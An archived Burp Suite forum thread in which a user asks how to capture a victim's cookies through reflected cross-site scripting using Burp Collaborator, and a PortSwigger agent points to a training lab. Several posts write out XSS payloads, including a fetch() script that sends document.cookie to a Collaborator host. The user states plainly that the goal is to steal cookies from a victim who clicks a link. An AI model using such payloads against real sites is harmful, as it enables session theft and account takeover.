The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

How to fetch cookies

olek | Last updated: Nov 02, 2022 12:41PM UTC

Hi Team I have to ask again about how to fetch in Collaborator cookies.I read article in for example form submission you can do this that. <script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', { method: 'POST', mode: 'no-cors', body:document.cookie }); </script> But how to fetch for website where is reflected links. webiste.com/?q=<img src=xx onerror=alert(document.cookie)> Xss pop but how to fetch from that links cookie .? I'm not to smart person but please be patient explain my how to doing.

Liam, PortSwigger Agent | Last updated: Nov 02, 2022 02:17PM UTC

Hi Olek. Thanks for your message. Could we ask which article you a referencing?

olek | Last updated: Nov 02, 2022 02:56PM UTC

https://portswigger.net/web-security/cross-site-scripting But how to use Burp Collaborator fetch cookie https://insecure-website.com/status?message=<script>/*+Bad+stuff+here...+*/</script> <p>Status: <script>/* Bad stuff here... */</script></p>

Liam, PortSwigger Agent | Last updated: Nov 03, 2022 06:38AM UTC

Hi Olek. Check out and complete this lab: - https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies

olek | Last updated: Nov 03, 2022 12:30PM UTC

You do not understand me this is just for """"""Submit the following payload in a blog comment,"""""""""" My questions is ho to fetch links website.com/?q=<script>alert(0)</script> That payload is use for showing Vulnerability.But how really burp Collaborator will fetch that cookies.?

Liam, PortSwigger Agent | Last updated: Nov 03, 2022 12:56PM UTC

Hi Olek. This example script will make anyone who views the comment issue a POST request containing their cookie to your subdomain on the public Collaborator server. <script> fetch('https://BURP-COLLABORATOR-SUBDOMAIN', { method: 'POST', mode: 'no-cors', body:document.cookie }); </script>

olek | Last updated: Nov 03, 2022 01:36PM UTC

Liam This script is only for form which is on website .I looking for this portswigger.net/?q=<script>alert(document.cookies)%3B<%2Fscript> How line with burp collaborate should looks like for fetch cookies This links is send for Victim.The Victim click links .I need get cookies from Victim.

olek | Last updated: Nov 06, 2022 09:14PM UTC

Ok it is respond but any cookies not coming.? WHY!! HTTP/1.1 200 OK Server: Burp Collaborator https://burpcollaborator.net/ X-Collaborator-Version: 4 Content-Type: text/html Content-Length: 55 <html><body>i8lkjvwn0w7i1xg6las2sbzjjgigz</body></html>

Liam, PortSwigger Agent | Last updated: Nov 07, 2022 08:58AM UTC

Hi Olek. It's not clear what you are trying to achieve. Could you provide us with some further detail, please?

olek | Last updated: Nov 07, 2022 02:07PM UTC

1.I want to see how fetch cookies from Victim works in real live .? vulnerabilitywebsite.com/?q=<script>alert(1)</script><b>Click me</b> 2.How to get cookies form this links send to victim ? I know people use some php server get cookies .But I want to use Burp Collaborator and see cookies from Victim. How do it ??

Liam, PortSwigger Agent | Last updated: Nov 08, 2022 09:04AM UTC

Hi Olek. We provide learnings on our Web Security Academy. While we endeavor to provide fast and excellent support in relation to addressing problems with Burp and implementing new features, the help you are looking for is really beyond the scope of our product support.

olek | Last updated: Nov 08, 2022 02:01PM UTC